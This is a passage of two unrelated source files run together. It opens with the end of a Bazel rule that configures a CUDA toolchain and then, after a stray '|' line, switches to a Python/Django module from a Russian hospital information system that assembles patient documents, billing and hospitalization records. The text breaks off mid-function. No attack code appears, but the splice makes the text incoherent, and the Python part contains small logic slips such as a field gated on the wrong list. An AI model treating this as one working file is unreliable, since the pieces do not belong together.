"cuda/build_defs.bzl",
config_repo_label(remote_config_repo, "cuda:build_defs.bzl"),
{},
)
repository_ctx.template(
"cuda/cuda/cuda_config.h",
config_repo_label(remote_config_repo, "cuda:cuda/cuda_config.h"),
{},
)
repository_ctx.template(
"cuda/cuda/cuda_config.py",
config_repo_label(remote_config_repo, "cuda:cuda/cuda_config.py"),
_py_tmpl_dict({}),
)
repository_ctx.template(
"crosstool/BUILD",
config_repo_label(remote_config_repo, "crosstool:BUILD"),
{},
)
repository_ctx.template(
"crosstool/cc_toolchain_config.bzl",
config_repo_label(remote_config_repo, "crosstool:cc_toolchain_config.bzl"),
{},
)
repository_ctx.template(
"crosstool/clang/bin/crosstool_wrapper_driver_is_not_gcc",
config_repo_label(remote_config_repo, "crosstool:clang/bin/crosstool_wrapper_driver_is_not_gcc"),
{},
)
def _cuda_autoconf_impl(repository_ctx):
"""Implementation of the cuda_autoconf repository rule."""
if not enable_cuda(repository_ctx):
_create_dummy_repository(repository_ctx)
elif get_host_environ(repository_ctx, _TF_CUDA_CONFIG_REPO) != None:
has_cuda_version = get_host_environ(repository_ctx, _TF_CUDA_VERSION) != None
has_cudnn_version = get_host_environ(repository_ctx, _TF_CUDNN_VERSION) != None
if not has_cuda_version or not has_cudnn_version:
auto_configure_fail("%s and %s must also be set if %s is specified" %
(_TF_CUDA_VERSION, _TF_CUDNN_VERSION, _TF_CUDA_CONFIG_REPO))
_create_remote_cuda_repository(
repository_ctx,
get_host_environ(repository_ctx, _TF_CUDA_CONFIG_REPO),
)
else:
_create_local_cuda_repository(repository_ctx)
_ENVIRONS = [
_GCC_HOST_COMPILER_PATH,
_GCC_HOST_COMPILER_PREFIX,
_CLANG_CUDA_COMPILER_PATH,
"TF_NEED_CUDA",
"TF_CUDA_CLANG",
_TF_DOWNLOAD_CLANG,
_CUDA_TOOLKIT_PATH,
_CUDNN_INSTALL_PATH,
_TF_CUDA_VERSION,
_TF_CUDNN_VERSION,
_TF_CUDA_COMPUTE_CAPABILITIES,
"NVVMIR_LIBRARY_DIR",
_PYTHON_BIN_PATH,
"TMP",
"TMPDIR",
"TF_CUDA_PATHS",
]
remote_cuda_configure = repository_rule(
implementation = _create_local_cuda_repository,
environ = _ENVIRONS,
remotable = True,
attrs = {
"environ": attr.string_dict(),
},
)
cuda_configure = repository_rule(
implementation = _cuda_autoconf_impl,
environ = _ENVIRONS + [_TF_CUDA_CONFIG_REPO],
)
"""Detects and configures the local CUDA toolchain.
Add the following to your WORKSPACE FILE:
```python
cuda_configure(name = "local_config_cuda")
```
Args:
name: A unique name for this workspace rule.
"""
|
import datetime
import zlib
from collections import OrderedDict
from copy import deepcopy
from decimal import Decimal
from django.db.models import Q
from clients.models import Document, DispensaryReg, Card
from directions.models import Napravleniya, Issledovaniya, ParaclinicResult, IstochnikiFinansirovaniya, PersonContract
from directory.models import Researches
from laboratory import utils
from laboratory.utils import strdate
from api.stationar.stationar_func import hosp_get_data_direction, check_transfer_epicrisis
from api.stationar.sql_func import get_result_value_iss
from utils.dates import normalize_date
def get_all_doc(docs: [Document]):
"""
возвращает словарь словарей documents. Данные о документах: паспорт : номер: серия, полис: номер, снислс: номер
"""
documents = {
'passport': {'num': "", 'serial': "", 'date_start': "", 'issued': ""},
'polis': {'serial': "", 'num': "", 'issued': ""},
'snils': {'num': ""},
'bc': {'num': "", 'serial': "", 'date_start': "", 'issued': ""},
}
for d in docs:
if d.document_type.title == "СНИЛС":
documents["snils"]["num"] = d.number
if d.document_type.title == 'Паспорт гражданина РФ':
documents["passport"]["num"] = d.number
documents["passport"]["serial"] = d.serial
documents["passport"]["date_start"] = "" if not d.date_start else d.date_start.strftime("%d.%m.%Y")
documents["polis"]["issued"] = d.who_give
if d.document_type.title == 'Полис ОМС':
documents["polis"]["num"] = d.number
documents["polis"]["serial"] = d.serial
documents["polis"]["date_start"] = "" if not d.date_start else d.date_start.strftime("%d.%m.%Y")
documents["polis"]["issued"] = d.who_give
if d.document_type.title == 'Свидетельство о рождении':
documents["bc"]["num"] = d.number
documents["bc"]["serial"] = d.serial
documents["bc"]["date_start"] = "" if not d.date_start else d.date_start.strftime("%d.%m.%Y")
documents["bc"]["issued"] = d.who_give
return documents
def get_coast_from_issledovanie(dir_research_loc):
"""
При печати листа на оплату возвращает (цены из записанных в Исследования)
На основании прайса, услуг возвращает Для листа на оплату {
направление: {услуга:[цена, скидка, количество],услуга:[цена, скидка, количество]},
направление: {услуга:[цена, скидка, количество],услуга:[цена, скидка, количество]},
направление: {услуга:[цена, скидка, количество],услуга:[цена, скидка, количество]},
}
"""
d = tuple()
if type(dir_research_loc) == dict:
dict_coast = {}
for k, v in dir_research_loc.items():
d = {
r: [
s,
d,
h,
]
for r, s, d, h in Issledovaniya.objects.filter(napravleniye=k, research__in=v, coast__isnull=False).values_list('research_id', 'coast', 'discount', 'how_many')
}
dict_coast[k] = d
return dict_coast
else:
return 0
def get_research_by_dir(dir_temp_l):
"""
Получить словаь: {направление1:[услуга1, услуга2, услуга3],направление2:[услуга1].....}
:param dir_temp_l:
:return:
"""
dict_research_dir = {}
for i in dir_temp_l:
# Если есть хотя бы одно сохранения услуги по направлению, то не учитывается
if any([x.doc_save is not None for x in Issledovaniya.objects.filter(napravleniye=i)]):
continue
else:
research_l = [x.research_id for x in Issledovaniya.objects.filter(napravleniye=i)]
dict_research_dir[i] = research_l
return dict_research_dir
def get_final_data(research_price_loc):
"""
Получить итоговую структуру данных: код услуги, напрвление, услуга, цена, скидка/наценка, цена со скидкой, кол-во, сумма
Направление указывается один раз для нескольких строк
"""
total_sum = 0
tmp_data = []
# is_discount = False
z = ""
x = ""
tmp_napr = []
for k, v in research_price_loc.items():
# research_attr = ([s for s in Researches.objects.filter(id__in=v.keys()).values_list('id', 'title')])
research_attr = [s for s in Researches.objects.filter(id__in=v.keys()).values_list('id', 'title', 'internal_code')]
research_attr_list = [list(z) for z in research_attr]
for research_id, research_coast in v.items():
h = []
for j in research_attr_list:
if research_id == j[0]:
if k != 0:
h.append(k)
k = 0
else:
h.append("")
h.extend([j[2], j[1]])
h.append("{:,.2f}".format(research_coast[0]).replace(",", " "))
coast_with_discount = research_coast[0] + (research_coast[0] * research_coast[1] / 100)
if research_coast[1] != 0:
z = "+"
if research_coast[1] > 0:
x = "+"
else:
x = ""
h.append(x + str(research_coast[1]))
h.append("{:,.2f}".format(coast_with_discount).replace(",", " "))
h.append(research_coast[2])
research_sum = coast_with_discount * research_coast[2]
h.append("{:,.2f}".format(research_sum).replace(",", " "))
h[0], h[1] = h[1], h[0]
total_sum += research_sum
research_attr_list.remove(j)
tmp_data.append(h)
if h[1]:
tmp_napr.append(h[1])
if h:
break
res_lis = []
for t in tmp_data:
tmp_d = list(map(str, t))
res_lis.append(tmp_d)
total_data = []
total_data.append(res_lis)
total_data.append("{:,.2f}".format(total_sum).replace(",", " "))
if z == "+":
total_data.append("is_discount")
else:
total_data.append("no_discount")
total_data.append(tmp_napr)
# total_data:[стру-рка данных, итоговая сумма, есть ли скидка, номера направлений]
return total_data
def get_data_individual(card_object):
"""
Получает на входе объект Карта
возвращает словарь атрибутов по карте и Физ.лицу(Индивидуалу)
:param card_object:
:return:
"""
ind_data = {'ind': card_object.individual}
ind_data['age'] = ind_data['ind'].age()
ind_data['doc'] = Document.objects.filter(individual=ind_data['ind'], is_active=True)
ind_data['fio'] = ind_data['ind'].fio()
ind_data['born'] = ind_data['ind'].bd()
ind_data['main_address'] = "____________________________________________________" if not card_object.main_address else card_object.main_address
ind_data['fact_address'] = "____________________________________________________" if not card_object.fact_address else card_object.fact_address
# document_passport = "Паспорт РФ"
ind_documents = get_all_doc(ind_data['doc'])
ind_data['passport_num'] = ind_documents['passport']['num']
ind_data['passport_serial'] = ind_documents['passport']['serial']
ind_data['passport_date_start'] = ind_documents['passport']['date_start']
ind_data['passport_issued'] = ind_documents['passport']['issued']
ind_data['bc_num'] = ind_documents['bc']['num']
ind_data['bc_serial'] = ind_documents['bc']['serial']
ind_data['bc_date_start'] = ind_documents['bc']['date_start']
ind_data['bc_issued'] = ind_documents['bc']['issued']
ind_data['snils'] = ind_documents["snils"]["num"]
ind_data['oms'] = {}
ind_data['oms']['polis_num'] = ind_documents["polis"]["num"]
ind_data['oms']['polis_serial'] = ind_documents["polis"]["serial"]
# ind_data['oms']['polis_date_start'] = ind_documents["polis"]["date_start"]
ind_data['oms']['polis_issued'] = ind_documents["polis"]["issued"]
return ind_data
def form_notfound():
"""
В случае не верной настройки форм по типам и функциям или переданным аргументам в параметры
:return:
"""
from reportlab.pdfbase import pdfmetrics
from reportlab.pdfbase.ttfonts import TTFont
from reportlab.platypus import SimpleDocTemplate, Paragraph, Spacer
from reportlab.lib.styles import getSampleStyleSheet
from reportlab.lib.pagesizes import A4
from reportlab.lib.units import mm
from copy import deepcopy
from reportlab.lib.enums import TA_CENTER
import os.path
from io import BytesIO
from laboratory.settings import FONTS_FOLDER
buffer = BytesIO()
pdfmetrics.registerFont(TTFont('PTAstraSerifBold', os.path.join(FONTS_FOLDER, 'PTAstraSerif-Bold.ttf')))
pdfmetrics.registerFont(TTFont('PTAstraSerifReg', os.path.join(FONTS_FOLDER, 'PTAstraSerif-Regular.ttf')))
doc = SimpleDocTemplate(
buffer, pagesize=A4, leftMargin=10 * mm, rightMargin=10 * mm, topMargin=10 * mm, bottomMargin=10 * mm, allowSplitting=1, title="Форма {}".format("Паспорт здоровья")
)
styleSheet = getSampleStyleSheet()
style = styleSheet["Normal"]
style.fontName = "PTAstraSerifBold"
style.fontSize = 16
style.leading = 15
styleBold = deepcopy(style)
styleBold.fontName = "PTAstraSerifBold"
styleCenter = deepcopy(style)
styleCenter.alignment = TA_CENTER
styleCenterBold = deepcopy(styleBold)
styleCenterBold.alignment = TA_CENTER
objs = [
Spacer(1, 3 * mm),
Paragraph('<font face="PTAstraSerifBold">Ая-я-я-я-я-я-я-яй!</font>', styleCenter),
Spacer(1, 3 * mm),
Paragraph('<font face="PTAstraSerifBold">Что-то Администраторы не верно настроили с типами форм! </font>', styleCenter),
Spacer(1, 3 * mm),
Paragraph('<font face="PTAstraSerifBold">А-та-та-та им!</font>', styleCenter),
]
doc.build(objs)
pdf = buffer.getvalue()
buffer.close()
return pdf
def get_doc_results(doc_obj, date_result):
"""
возвращает результаты врача за определенную дату. ***** Ни в коем случае не переделывать на диапозон дат
"""
doc_results = Issledovaniya.objects.filter(doc_confirmation=doc_obj, time_confirmation__date=date_result, napravleniye__isnull=False)
return doc_results
def get_finaldata_talon(doc_result_obj):
"""
Вход результаты врача за определенную дату
Выход: стр-ра данных {'№п.п':'номер', 'ФИО пациента':'Иванов Иван Иванович', '№ карты (тип)':'1212 (L2)',
'Данные полиса':'номер;Компаня', 'цель посещения': '(код)', 'первичны прием':'Нет',
'Диагноз по МКБ': '(код)', 'Впервые':'Да', 'Результат обращения':'код',
'Исход':'Код', 'Д-стоит':'коды', 'Д-взят':'коды', 'Д-снят':'коды'
'причина снятия':'', 'Онкоподозрение':'Да'
"""
fin_oms = 'омс'
fin_dms = 'дмс'
fin_pay = 'платно'
fin_medexam = 'медосмотр'
fin_disp = 'диспансеризация'
fin_budget = 'бюджет'
fin_source = OrderedDict()
fin_source[fin_oms] = OrderedDict()
fin_source[fin_pay] = OrderedDict()
fin_source[fin_dms] = OrderedDict()
fin_source[fin_medexam] = OrderedDict()
fin_source[fin_disp] = OrderedDict()
fin_source[fin_budget] = OrderedDict()
fin_source_iss = OrderedDict()
fin_source_iss[fin_oms] = OrderedDict()
fin_source_iss[fin_pay] = OrderedDict()
fin_source_iss[fin_dms] = OrderedDict()
fin_source_iss[fin_medexam] = OrderedDict()
fin_source_iss[fin_disp] = OrderedDict()
fin_source_iss[fin_budget] = OrderedDict()
oms_count = 0
dms_count = 0
pay_count = 0
disp_count = 0
medexam_count = 0
budget_count = 0
empty = '-'
today = utils.timezone.now().date()
for i in doc_result_obj:
napr_attr = Napravleniya.get_attr(i.napravleniye)
temp_dict = OrderedDict()
temp_dict_iss = OrderedDict()
dict_fsourcce = ''
order = ''
if napr_attr['istochnik_f'] in ['омс', '']:
oms_count += 1
dict_fsourcce = fin_oms
order = oms_count
elif napr_attr['istochnik_f'] == 'платно':
pay_count += 1
dict_fsourcce = fin_pay
order = pay_count
elif napr_attr['istochnik_f'] == 'дмс':
dms_count += 1
dict_fsourcce = fin_dms
order = dms_count
elif napr_attr['istochnik_f'] == 'медосмотр':
medexam_count += 1
dict_fsourcce = fin_medexam
order = medexam_count
elif napr_attr['istochnik_f'] == 'диспансеризация':
disp_count += 1
dict_fsourcce = fin_disp
order = disp_count
elif napr_attr['istochnik_f'] == 'бюджет':
budget_count += 1
dict_fsourcce = fin_budget
order = budget_count
else:
continue
polis_who_giv = empty if not napr_attr['polis_who_give'] else napr_attr['polis_who_give']
polis_num = empty if not napr_attr['polis_n'] else napr_attr['polis_n']
temp_dict['client_fio'] = napr_attr['client_fio'] + ', ' + napr_attr['client_bd']
temp_dict['med_exam'] = strdate(i.medical_examination) + ', ' + str(i.napravleniye_id)
num_poliklinika = f'\n({napr_attr["number_poliklinika"]})' if napr_attr['number_poliklinika'] else ''
temp_dict['card_num'] = napr_attr['card_num'] + num_poliklinika
temp_dict['polis_data'] = '<u>' + polis_num + '</u>' + '<br/>' + polis_who_giv
temp_dict_iss = temp_dict.copy()
temp_dict_iss['research_code'] = i.research.code
temp_dict_iss['research_title'] = i.research.title
temp_dict['purpose'] = empty if not i.purpose else i.purpose
temp_dict['is_first_reception'] = 'Да' if i.research.is_first_reception else 'Нет'
temp_dict['diagnos'] = empty if not i.diagnos else i.diagnos
temp_dict['first_time'] = 'Да' if i.first_time else 'Нет'
temp_dict['result_reception'] = empty if not i.result_reception else i.result_reception
temp_dict['outcome_illness'] = empty if not i.outcome_illness else i.outcome_illness
# Данные Д-учета
disp = DispensaryReg.objects.filter(Q(card=i.napravleniye.client), (Q(date_end=None) | Q(date_end=today)))
d_stand = []
d_take = []
d_stop = []
d_whystop = []
if disp:
for d in disp:
if d.date_end is None and d.date_start != i.time_confirmation.date():
date_start = strdate(d.date_start, short_year=True)
date_start = normalize_date(date_start)
d_stand.append(f'{d.diagnos}<br/>{date_start}<br/>')
elif d.date_end is None and d.date_start == i.time_confirmation.date():
d_take.append(d.diagnos)
elif d.date_end == i.time_confirmation.date():
d_stop.append(d.diagnos)
d_whystop.append(d.why_stop)
temp_dict['d_stand'] = '' if not d_stand else ''.join(d_stand)
temp_dict['d_take'] = '' if not d_take else ', '.join(d_take)
temp_dict['d_stop'] = '' if not d_stand else ', '.join(d_stop)
temp_dict['d_whystop'] = '' if not d_whystop else ', '.join(d_whystop)
temp_dict['maybe_onco'] = 'Да' if i.maybe_onco else ''
fin_source[dict_fsourcce].update({order: temp_dict})
fin_source_iss[dict_fsourcce].update({order: temp_dict_iss})
if Issledovaniya.objects.filter(parent=i).exists():
temp_dict_iss_copy = deepcopy(temp_dict_iss)
add_iss_dict = OrderedDict()
for iss in Issledovaniya.objects.filter(parent=i):
temp_dict_iss_copy['research_code'] = iss.research.code
temp_dict_iss_copy['research_title'] = iss.research.title
order = Decimal(str(order)) + Decimal('0.1')
add_iss_dict[order] = deepcopy(temp_dict_iss_copy)
fin_source_iss[dict_fsourcce].update(add_iss_dict)
return [fin_source, fin_source_iss]
def primary_reception_get_data(hosp_first_num):
# Получение данных из певичного приема
hosp_primary_receptions = hosp_get_data_direction(hosp_first_num, site_type=0, type_service='None', level=2)
hosp_primary_iss, primary_research_id = None, None
if hosp_primary_receptions:
hosp_primary_iss = hosp_primary_receptions[0].get('iss')
primary_research_id = hosp_primary_receptions[0].get('research_id')
titles_field = [
'Дата поступления',
'Время поступления',
'Виды транспортировки',
'Побочное действие лекарств (непереносимость)',
'Кем направлен больной',
'Вид госпитализации',
'Время через, которое доставлен после начала заболевания, получения травмы',
'Диагноз направившего учреждения',
'Диагноз при поступлении',
'Госпитализирован по поводу данного заболевания',
'Общее состояние',
'Социальный статус',
'Категория льготности',
'Всего госпитализаций',
'Вид травмы',
'Группа крови',
'Резус принадлежность',
'Вес',
]
list_values = None
if titles_field and hosp_primary_receptions:
list_values = get_result_value_iss(hosp_primary_iss, primary_research_id, titles_field)
date_entered_value, time_entered_value, type_transport, medicament_allergy = '', '', '', ''
who_directed, plan_hospital, extra_hospital, type_hospital = '', '', '', ''
time_start_ill, diagnos_who_directed, diagnos_entered = '', '', ''
what_time_hospitalized, state, social_status, category_privilege = '', '', '', ''
all_hospitalized, type_trauma, blood_group, resus_factor = '', '', '', ''
weight = ''
if list_values:
for i in list_values:
if i[3] == 'Дата поступления':
date_entered_value = normalize_date(i[2])
continue
if i[3] == 'Время поступления':
time_entered_value = i[2]
continue
if i[3] == 'Виды транспортировки':
type_transport = i[2]
continue
if i[3] == 'Побочное действие лекарств (непереносимость)':
medicament_allergy = i[2]
continue
if i[3] == 'Кем направлен больной':
who_directed = i[2]
continue
if i[3] == 'Вид госпитализации':
type_hospital = i[2]
if type_hospital.lower() == 'экстренная':
time_start_ill_obj = get_result_value_iss(hosp_primary_iss, primary_research_id, ['Время через, которое доставлен после начала заболевания, получения травмы'])
if time_start_ill_obj:
time_start_ill = time_start_ill_obj[0][2]
extra_hospital = "Да"
plan_hospital = "Нет"
else:
plan_hospital = "Да"
extra_hospital = "Нет"
time_start_ill = ''
if i[3] == 'Диагноз направившего учреждения':
diagnos_who_directed = i[2]
continue
if i[3] == 'Диагноз при поступлении':
diagnos_entered = i[2]
continue
if i[3] == 'Госпитализирован по поводу данного заболевания':
what_time_hospitalized = i[2]
continue
if i[3] == 'Общее состояние':
state = i[2]
continue
if i[3] == 'Социальный статус':
social_status = i[2]
continue
if i[3] == 'Категория льготности':
category_privilege = i[2]
continue
if i[3] == 'Всего госпитализаций':
all_hospitalized = i[2]
continue
if i[3] == 'Вид травмы':
type_trauma = i[2]
continue
if i[3] == 'Группа крови':
blood_group = i[2]
continue
if i[3] == 'Резус принадлежность':
resus_factor = i[2]
continue
if i[3] == 'Вес':
weight = i[2]
continue
return {
'date_entered_value': date_entered_value,
'time_entered_value': time_entered_value,
'type_transport': type_transport,
'medicament_allergy': medicament_allergy,
'who_directed': who_directed,
'plan_hospital': plan_hospital,
'extra_hospital': extra_hospital,
'type_hospital': type_hospital,
'time_start_ill': time_start_ill,
'diagnos_who_directed': diagnos_who_directed,
'diagnos_entered': diagnos_entered,
'what_time_hospitalized': what_time_hospitalized,
'state': state,
'social_status': social_status,
'category_privilege': category_privilege,
'all_hospitalized': all_hospitalized,
'type_trauma': type_trauma,
'blood_group': blood_group,
'resus_factor': resus_factor,
'weight': weight,
}
def hosp_extract_get_data(hosp_last_num):
# Получение данных из выписки
hosp_extract = hosp_get_data_direction(hosp_last_num, site_type=7, type_service='None', level=2)
if not hosp_extract:
return {}
hosp_extract_iss, extract_research_id, doc_confirm = None, None, None
if hosp_extract:
hosp_extract_iss = hosp_extract[0].get('iss')
doc_confirm = Issledovaniya.objects.get(pk=hosp_extract_iss).doc_confirmation
if not doc_confirm:
return {}
extract_research_id = hosp_extract[0].get('research_id')
titles_field = [
'Время выписки',
'Дата выписки',
'Основной диагноз (описание)',
'Основной диагноз по МКБ',
'Осложнение основного диагноза (описание)',
'Осложнение основного диагноза по МКБ',
'Сопутствующий диагноз (описание)',
'Сопутствующий диагноз по МКБ',
'Исход госпитализации',
'Результат госпитализации',
'Проведено койко-дней',
'Заведующий отделением',
'Палата №',
]
list_values = None
if titles_field and hosp_extract:
list_values = get_result_value_iss(hosp_extract_iss, extract_research_id, titles_field)
date_value, time_value = '', ''
final_diagnos, other_diagnos, near_diagnos, outcome, final_diagnos_mkb, other_diagnos_mkb, near_diagnos_mkb = '', '', '', '', '', '', ''
days_count, result_hospital, manager_depart, room_num = '', '', '', ''
if list_values:
for i in list_values:
if i[3] == 'Дата выписки':
date_value = normalize_date(i[2])
if i[3] == 'Время выписки':
time_value = i[2]
if i[3] == 'Основной диагноз (описание)':
final_diagnos = i[2]
if i[3] == 'Осложнение основного диагноза (описание)':
other_diagnos = i[2]
if i[3] == 'Сопутствующий диагноз (описание)':
near_diagnos = i[2]
if i[3] == 'Исход госпитализации':
outcome = i[2]
if i[3] == 'Результат госпитализации':
result_hospital = i[2]
if i[3] == 'Основной диагноз по МКБ':
final_diagnos_mkb = str(i[2])
if i[3] == 'Осложнение основного диагноза по МКБ':
other_diagnos_mkb = str(i[2]).split(' ')[0]
if i[3] == 'Сопутствующий диагноз по МКБ':
near_diagnos_mkb = str(i[2]).split(' ')[0]
if i[3] == 'Проведено койко-дней':
days_count = str(i[2])
if i[3] == 'Заведующий отделением':
manager_depart = str(i[2])
if i[3] == 'Палата №':
room_num = str(i[2])
doc_fio = doc_confirm.get_fio()
return {
'date_value': date_value,
'time_value': time_value,
'final_diagnos': final_diagnos,
'other_diagnos': other_diagnos,
'near_diagnos': near_diagnos,
'outcome': outcome,
'final_diagnos_mkb': final_diagnos_mkb,
'other_diagnos_mkb': other_diagnos_mkb,
'near_diagnos_mkb': near_diagnos_mkb,
'extract_iss': hosp_extract_iss,
'days_count': days_count,
'result_hospital': result_hospital,
'doc_fio': doc_fio,
'manager_depart': manager_depart,
'room_num': room_num,
}
def hosp_get_clinical_diagnos(hosp_obj):
clinic_diagnos = ''
tmp_clinic_diagnos = []
for i in hosp_obj:
hosp_diagnostic_epicris = hosp_get_data_direction(i['direction'], site_type=6, type_service='None', level=2)
day_entries_iss = []
day_entries_research_id = None
if hosp_diagnostic_epicris:
for i in hosp_diagnostic_epicris:
# найти эпикризы диагностические
if i.get('research_title').lower().find('диагностич') != -1:
day_entries_iss.append(i.get('iss'))
if not day_entries_research_id:
day_entries_research_id = i.get('research_id')
titles_field = ['Диагноз клинический', 'Дата установления диагноза', 'Основной', 'Осложнение', 'Сопутствующий']
list_values = []
if titles_field and day_entries_iss:
for i in day_entries_iss:
list_values.append(get_result_value_iss(i, day_entries_research_id, titles_field))
if list_values:
for fields in list_values:
clinical_data = {'clinic_diagnos': '', 'main_diagnos': '', 'other_diagnos': '', 'near_diagnos': '', 'date': ''}
for i in fields:
if i[3] == 'Дата установления диагноза':
clinical_data['date'] = normalize_date(i[2])
continue
if i[3] == 'Диагноз клинический':
clinical_data['clinic_diagnos'] = i[2]
continue
if i[3] == 'Основной':
clinical_data['main_diagnos'] = f"Основной: {i[2]}"
continue
if i[3] == 'Осложнение':
clinical_data['other_diagnos'] = f"; Осложнение: {i[2]}"
continue
if i[3] == 'Сопутствующий':
clinical_data['near_diagnos'] = f"; Сопутствующий: {i[2]}"
continue
if clinical_data['date'] and (clinical_data['clinic_diagnos'] or clinical_data['main_diagnos']):
tmp_clinic_diagnos.append(clinical_data.copy())
for i in tmp_clinic_diagnos:
clinic_diagnos = f"{clinic_diagnos}{i['clinic_diagnos']} <u>{i['main_diagnos']}</u>{i['other_diagnos']}{i['near_diagnos']}; дата: {i['date']}<br/>"
return clinic_diagnos
def hosp_get_transfers_data(hosp_nums_obj):
titles_field = ['Дата перевода', 'Время перевода']
date_transfer_value, time_transfer_value = '', ''
transfers = []
list_values = None
for i in range(len(hosp_nums_obj)):
if i == 0:
continue
transfer_research_title = hosp_nums_obj[i].get('research_title')
# получить для текущего hosp_dir эпикриз с title - перевод.....
from_hosp_dir_transfer = hosp_nums_obj[i - 1].get('direction')
epicrisis_data = hosp_get_data_direction(from_hosp_dir_transfer, site_type=6, type_service='None', level=2)
if epicrisis_data:
result_check = check_transfer_epicrisis(epicrisis_data)
if result_check['iss']:
iss_transfer, research_id_transfer = result_check['iss'], result_check['research_id']
if titles_field and iss_transfer:
list_values = get_result_value_iss(iss_transfer, research_id_transfer, titles_field)
else:
continue
if list_values:
for i in list_values:
if i[3] == 'Дата перевода':
date_transfer_value = normalize_date(i[2])
continue
if i[3] == 'Время перевода':
time_transfer_value = i[2]
continue
transfers.append({'transfer_research_title': transfer_research_title, 'date_transfer_value': date_transfer_value, 'time_transfer_value': time_transfer_value})
return transfers
def hosp_patient_movement(hosp_nums_obj):
titles_field = ['Дата перевода']
patient_movement = []
list_values = None
for i in range(len(hosp_nums_obj)):
date_out, diagnos_mkb, doc_confirm_code = '', '', ''
bed_profile_research_title = hosp_nums_obj[i].get('research_title')
hosp_dir = hosp_nums_obj[i].get('direction')
primary_reception_data = primary_reception_get_data(hosp_dir)
hosp_extract_data = hosp_get_data_direction(hosp_dir, site_type=7, type_service='None', level=2)
if hosp_extract_data:
extract_data = hosp_extract_get_data(hosp_dir)
if extract_data:
date_out = extract_data['date_value']
diagnos_mkb = extract_data['final_diagnos_mkb']
doc_confirm_code = (
None if not Issledovaniya.objects.get(pk=extract_data['extract_iss']) else Issledovaniya.objects.get(pk=extract_data['extract_iss']).doc_confirmation.personal_code
)
list_values = None
epicrisis_data = hosp_get_data_direction(hosp_dir, site_type=6, type_service='None', level=2)
if epicrisis_data:
result_check = check_transfer_epicrisis(epicrisis_data)
if result_check['iss']:
iss_transfer, research_id_transfer = result_check['iss'], result_check['research_id']
if titles_field and iss_transfer:
list_values = get_result_value_iss(iss_transfer, research_id_transfer, titles_field)
if list_values:
for i in list_values:
if i[3] == 'Дата перевода':
date_out = normalize_date(i[2])
if i[3] == 'Клинический диагноз по МКБ':
diagnos_mkb = i[2]
patient_movement.append(
{
'bed_profile_research_title': bed_profile_research_title,
'date_entered_value': primary_reception_data['date_entered_value'],
'date_oute': date_out,
'diagnos_mkb': diagnos_mkb,
'doc_confirm_code': doc_confirm_code,
}
)
return patient_movement
def hosp_get_operation_data(num_dir):
hosp_operation = hosp_get_data_direction(num_dir, site_type=3, type_service='None', level=-1)
operation_iss_research = []
if hosp_operation:
for i in hosp_operation:
# найти протоколы по типу операции
if (i.get('research_title').lower().find('операци') != -1 or i.get('research_title').lower().find('манипул') != -1) and i['date_confirm']:
operation_iss_research.append({'iss': i['iss'], 'research': i['research_id']})
titles_field = [
'Название операции',
'Дата проведения',
'Время начала',
'Время окончания',
'Метод обезболивания',
'Осложнения',
'Код операции',
'Код манипуляции',
'Оперативное вмешательство',
'Код анестезиолога',
'Категория сложности',
'Диагноз после оперативного лечения',
'МКБ 10',
'Оперировал',
'Код хирурга',
]
list_values = []
operation_result = []
if titles_field and operation_iss_research and hosp_operation:
for i in operation_iss_research:
list_values.append(get_result_value_iss(i['iss'], i['research'], titles_field))
operation_result = []
for fields_operation in list_values:
pk_iss_operation = fields_operation[0][1]
operation_data = {
'name_operation': '',
'date': '',
'time_start': '',
'time_end': '',
'anesthesia method': '',
'complications': '',
'doc_fio': '',
'code_operation': '',
'code_doc_anesthesia': '',
'plan_operation': '',
'diagnos_after_operation': '',
'mkb10': '',
'category_difficult': '',
'doc_code': '',
}
iss_obj = Issledovaniya.objects.filter(pk=pk_iss_operation).first()
if not iss_obj.time_confirmation:
continue
operation_data['doc_fio'] = iss_obj.doc_confirmation_fio
operation_data['doc_code'] = None if not Issledovaniya.objects.get(pk=pk_iss_operation) else Issledovaniya.objects.get(pk=pk_iss_operation).doc_confirmation.personal_code
if operation_data['doc_code'] == 0:
operation_data['doc_code'] = ''
category_difficult = ''
for field in fields_operation:
if field[3] == 'Название операции':
operation_data['name_operation'] = field[2]
continue
if field[3] == 'Дата проведения':
operation_data['date'] = normalize_date(field[2])
continue
if field[3] == 'Время начала':
operation_data['time_start'] = field[2]
continue
if field[3] == 'Время окончания':
operation_data['time_end'] = field[2]
continue
if field[3] == 'Метод обезболивания':
operation_data['anesthesia method'] = field[2]
continue
if field[3] == 'Осложнения':
operation_data['complications'] = field[2]
continue
if field[3] == 'Код операции':
operation_data['code_operation'] = field[2]
continue
if field[3] == 'Код манипуляции':
operation_data['code_operation'] = field[2]
continue
if field[3] == 'Код анестезиолога':
operation_data['code_doc_anesthesia'] = field[2]
continue
if field[3] == 'Оперативное вмешательство':
operation_data['plan_operation'] = field[2]
continue
if field[3] == 'Категория сложности':
operation_data['category_difficult'] = f"Сложность - {field[2]}"
continue
if field[3] == 'Диагноз после оперативного лечения':
operation_data['diagnos_after_operation'] = field[2]
continue
if field[3] == 'МКБ 10':
operation_data['mkb10'] = field[2]
continue
if field[3] == 'Оперировал':
if field[2]:
operation_data['doc_fio'] = field[2]
continue
if field[3] == 'Код хирурга':
if field[2]:
operation_data['doc_code'] = field[2]
continue
operation_data['name_operation'] = f"{operation_data['name_operation']} {category_difficult}"
operation_result.append(operation_data.copy())
return operation_result
def closed_bl(hosp_num_dir):
"""
Подтверждены больничные-протоколы со словом закрытие среди Б/Л?
"""
result_bl = hosp_get_data_direction(hosp_num_dir, site_type=8, type_service='None', level=-1)
num, who_get, who_care, start_date, end_date, start_work = '', '', '', '', '', ''
for i in result_bl:
if i['date_confirm'] is None:
continue
if i["research_title"].lower().find('закрыт') != -1:
data_closed_bl = ParaclinicResult.objects.filter(issledovaniye=i['iss'])
for b in data_closed_bl:
if b.field.title == "Лист нетрудоспособности №":
num = b.value
continue
if b.field.title == "Выдан кому":
who_get = b.value
continue
if b.field.title == "по уходу за":
who_care = b.value
continue
if b.field.title == "выдан с":
start_date = b.value
if start_date.find('-') != -1:
start_date = normalize_date(start_date)
continue
if b.field.title == "по":
end_date = b.value
if end_date.find('-') != -1:
end_date = normalize_date(end_date)
continue
if b.field.title == "к труду":
start_work = b.value
if start_work.find('-') != -1:
start_work = normalize_date(start_work)
continue
return {'is_closed': True, 'num': num, 'who_get': who_get, 'who_care': who_care, 'start_date': start_date, 'end_date': end_date, 'start_work': start_work}
return {'is_closed': False, 'num': num, 'who_get': who_get, 'who_care': who_care, 'start_date': start_date, 'end_date': end_date, 'start_work': start_work}
def create_contract(ind_dir, card_pk):
ind_card = Card.objects.get(pk=card_pk)
